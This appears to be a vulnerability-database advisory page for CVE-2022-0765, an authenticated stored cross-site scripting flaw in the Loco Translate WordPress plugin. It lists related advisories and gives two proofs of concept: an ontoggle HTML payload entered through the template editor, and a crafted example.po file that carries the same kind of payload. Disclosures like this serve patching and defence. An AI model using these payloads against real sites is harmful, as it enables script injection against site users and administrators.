Loco Translate Authenticated XSS via edit-template and example.p
Reporter | Title | Published | Views | Family All 9 |
---|---|---|---|---|
![]() | WordPress Loco Translate Cross Site Scripting | 7 Apr 202200:00 | β | packetstorm |
![]() | Cross site scripting | 18 Apr 202218:15 | β | prion |
![]() | WordPress Loco Translate pluginθ·¨η«θζ¬ζΌζ΄ | 11 Apr 202200:00 | β | cnvd |
![]() | WordPress Loco Translate Plugin < 2.6.1 - Authenticated Stored Cross-Site Scripting Vulnerability | 7 Apr 202200:00 | β | zdt |
![]() | CVE-2022-0765 Loco Translate < 2.6.1 - Authenticated Stored Cross-Site Scripting | 18 Apr 202217:10 | β | cvelist |
![]() | CVE-2022-0765 | 18 Apr 202218:15 | β | cve |
![]() | CVE-2022-0765 | 18 Apr 202218:15 | β | nvd |
![]() | WordPress Loco Translate plugin <= 2.6.0 - Authenticated Stored Cross-Site Scripting (XSS) vulnerability | 22 Mar 202200:00 | β | patchstack |
![]() | Loco Translate < 2.6.1 - Authenticated Stored Cross-Site Scripting | 22 Mar 202200:00 | β | wpvulndb |
## POC1: via (edit-template)
1.) Got to Plugin Loco Translate
2.) Enter Plugins Options
3.) Enter Edit Template Any Plugin
4.) Add New Message
5.) Edit Message
6.) Replace The Message With The Payload : ">'><details/open/ontoggle=alert('Yoho!')>
7.) Save
8.) Replicated
## POC2 via (example.po)
1.) Got to Plugin Loco Translate
2.) Enter Plugins Options Any Plugin
3.) Upload PO options
3.) Load example.po
## Example.po
msgid ""
msgstr ""
"Project-Id-Version: xss-tester\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2022-02-25 03:48+0000\n"
"PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE\n"
"Last-Translator: FULL NAME <EMAIL@ADDRESS>\n"
"Language-Team: \n"
"Language: \n"
"Plural-Forms: nplurals=INTEGER; plural=EXPRESSION;\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Generator: Loco https://localise.biz/\n"
"X-Loco-Version: 2.5.8; wp-5.9.1\n"
"X-Domain: xss-tester"
msgid "xss-tester"
msgstr ""
msgid "\">'><details/open/ontoggle=confirm('XSS')>"
msgstr ""
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo